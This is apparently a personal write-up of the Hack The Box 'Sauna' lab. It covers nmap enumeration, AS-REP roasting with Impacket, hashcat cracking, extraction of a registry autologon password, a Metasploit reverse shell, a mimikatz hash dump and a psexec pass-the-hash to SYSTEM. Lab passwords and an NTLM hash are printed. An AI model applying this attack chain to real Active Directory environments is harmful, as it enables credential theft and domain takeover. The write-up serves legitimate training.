Sauna HTB

Updated:November 3, 2021 pm


After running nmap these ports are open:

Nmap scan report for EGOTISTICALBANK (
Host is up (0.17s latency).
Not shown: 988 filtered ports
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-28 03:32:05Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-02-28T03:34:31
|_  start_date: N/A

First I add the domain EGOTISTICALBANK to /etc/hosts for later usage maybe. And the first thing I do is visiting the website. From the website after a bit of enumeration all I can get are a bunch of usernames from these pages:

Enumerating ldap port I get nothing more than the hostname which I already know.
Running enum4linux also does not give me much.
Also smbmap gives me nothing. After a bit of research I found out that companies use account username conventions. So maybe I can use some tools with these since I have a lot of ports which can allow me to specify a username without password at first.

I read about Ad user naming conventions and after I try to use the usernames against a impacket tool. The tool I use is caled GetNPUsers and it Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking. After a lot of trial and error I find the password of user beeing fsmith.

/opt/impacket/examples/ EGOTISTICALBANK/fsmith -dc-ip -request

Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation

[*] Cannot authenticate fsmith, getting its TGT

This would give me the users TGT which I can crack .

hashcat -m 13100 crackme.hash /usr/share/wordlists/rockyou.txt

And I found the password Thestrokes23

I do a full port scanning with verbose on nmap to check if windows remote management is enabled. After finding it is enabled I use evil-winrm and connect to it by providing the username fsmith and the cracked password.


From there I run Winpeas or any other enumeration script and find a hidden password inside this registry reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

The password belongs to user svc_loanmgr and the password is Moneymakestheworldgoround!

I login again by using evil-winrm

I generate a reverse shell by using metasploit and then run it. This would give me cmd shell. I then upload mimikatz and get Administrator ntlm hash, which then I use it with psexec and get shell as nt authority\system. administrator@ -hashes :d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation

[] Requesting shares on…..
] Found writable share ADMIN$
[] Uploading file TkxHqRZj.exe
] Opening SVCManager on…..
[] Creating service Pntp on…..
] Starting service Pntp…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.


Active Directory Attacks